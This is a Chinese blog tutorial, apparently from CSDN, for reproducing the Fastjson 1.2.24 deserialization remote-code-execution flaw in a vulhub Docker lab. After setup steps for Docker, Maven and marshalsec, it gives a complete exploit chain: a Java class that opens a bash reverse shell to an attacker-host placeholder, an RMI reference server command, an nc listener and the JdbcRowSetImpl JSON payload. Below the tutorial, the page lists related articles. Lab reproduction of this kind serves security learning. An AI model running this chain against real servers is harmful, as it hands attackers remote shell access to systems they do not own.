fastjson-1.2.24漏洞,搭建及复现,手把手图文教程

最新推荐文章于 2024-06-03 16:45:03 发布
最新推荐文章于 2024-06-03 16:45:03 发布
阅读量1.4k 收藏 7
点赞数 1
分类专栏: 笔记 文章标签: docker 容器 运维 linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyk961755/article/details/127162764
版权

fastjson-1.2.24漏洞,搭建及复现,手把手图文教程

java1.8、python,我就不写这么安装了

文章目录

一、搭建文件数据(docker、vulhub、mvn、RMI)

1.安装docker和docker-compose

安装完成后查看版本是否正常输出,或者把报错的安装全部安装也行
参考链接:
kali 2020安装docker

命令描述
docker -v查看docker版本
docker-compose -v查看docker-compose版本
sudo apt install docker安装docker
sudo apt install docker-compose安装docker-compose

在这里插入图片描述

2.准备vulhub

创建个fastjson1.2.24命名的目录,文件名:docker-compose.yml,内容为以下
这样就可以省略git vulhub的步骤,我试了一下是可以的

version: '2'
services:
 web:
   image: vulhub/fastjson:1.2.24
   ports:
    - "8090:8090"

或者你想全部git就执行下面代码

sudo git clone https://github.com/vulhub/vulhub.git

3.安装mvn命令

先从官网下载maven安装包
下载官网:Maven–下载Apache Maven
在这里插入图片描述

下载后解压到/opt
在这里插入图片描述

然后配置环境变量,打开/etc/profile文件,在末尾添加命令

export M2_HOME=/opt/apache-maven-3.6.3
export PATH=$PATH:$M2_HOME/bin

添加完后使环境生效

source /etc/profile

检查mvn是否安装正常

mvn -v

在这里插入图片描述

4.安装RMI服务器

编译marshalsec项目,启动RMI服务,监听端口并加载远程类

git clone https://github.com/mbechler/marshalsec.git

进入到marshalsec文件夹输入命令进行编译

mvn clean package -DskipTests

5.启动fastjson

cd 到步骤2目录,fastjson目录
在这里插入图片描述

使用docker-compose启动fastjson漏洞环境

docker-compose up -d

使用docke查看搭建情况及映射端口

docker ps

在这里插入图片描述

访问ip:端口,端口在docker ps里面,8090是端口,成功访问,搭建成功了
在这里插入图片描述

二、利用fastjson1.2.24

1.编写exp.java,反弹shell

exp.java

import java.lang.Runtime;
import java.lang.Process;

public class exp{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/攻击者ip/攻击者nc监听端口 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

2.编译exp.java,编译为exp.class

exp.java

javac exp.java

在这里插入图片描述

3.python开启web服务器

python2

python -m SimpleHTTPServer

python3

python -m http.server

4.开启RMI服务器

cd到marshalsec/target目录下,marshalsec是安装RMI的那个目录,target是编译后的目录
RMI端口自己自定义

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://攻击者ip:攻击者python开启的端口/#exp" 攻击者RMI端口

5.开启nc监听

nc监听端口要和exp.java里面的一致

nc -lvnp 攻击者nc监听端口

6.发送fastjson给服务器就可以

nc监听端口要和exp.java里面的一致

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://攻击者ip:攻击者RMI服务器端口/exp",
        "autoCommit":true
    }
}

复现利用成功
在这里插入图片描述

米汤爱学习
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fastjson反序列化-1.2.24漏洞利用与分析
hackzkaq的博客
01-24 977
Fastjson1.2.24版本是最先发现漏洞的版本,这篇文章也是作为学习Fastjson反序列化的开端。后续会继续学习Fastjson高版本的绕过。反序列化之路任重而道远。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
Fastjson 1.2.24漏洞搭建复现——详解
网安小白的博客
08-02 903
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
【网路安全---漏洞复现Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1740
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
fastjson 1.2.24 反序列化导致任意命令执行漏洞
最新发布
weixin_62117955的博客
06-03 1028
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。注:该漏洞可以反弹shell,方法与命令执行一样,构造的payload也与命令执行的一样,这里就不展示了。应用程序,用于接收和处理客户端的远程方法调用请求,实现分布式系统中的远程通信和方法调用。
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3064
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson 1.2.24 反序列化漏洞研究
辛勤搬砖的门卫的专栏
01-05 1184
Fastjson 反序列化漏洞
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2196
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson-1.2.24
04-24
Fastjson 1.2.24版本中,针对之前的安全漏洞进行了修复,增强了其安全性。开发者应定期更新Fastjson以确保应用的安全性。 7. 性能优化 Fastjson在设计时充分考虑了性能,如使用直接操作字节码的技术来提升速度,...
高版本的fastjson-1.2.71解决安全漏洞.rar
04-14
在标题提到的“高版本的fastjson-1.2.71解决安全漏洞”中,我们主要关注的是Fastjson如何通过更新到1.2.71版本来修复这些已知的安全问题。 Fastjson的安全漏洞通常涉及其自动类型识别机制。这个机制允许JSON字符串...
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 841
fastjson 1.2.24漏洞复现
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1049
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
FastJson1.2.24反序列化漏洞代码分析】
BigBirdSecurity的博客
07-24 985
FastJson漏洞代码分析,为了对漏洞理解更深入,也是为以后挖掘通用漏洞作铺垫,提升代码审计能力,积累更多的知识。简单分析一下fastjson反序列化漏洞的成因、调用过程和触发点。httpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttps。.........
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3745
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
【vulhub漏洞复现Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3706
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
【Java代码审计】Fastjson1.2.24漏洞分析
网络安全从业者的学习笔记
04-03 342
Fastjson是由阿里巴巴研发的一个java库,用来实现Java对象转换JSON格式以及JSON字符串转换为对象。 在Fastjson
Fastjson 1.2.24反序列化漏洞
weixin_51151498的博客
01-04 568
Fastjson 1.2.24反序列化漏洞
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1235
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化。java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

米汤爱学习

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值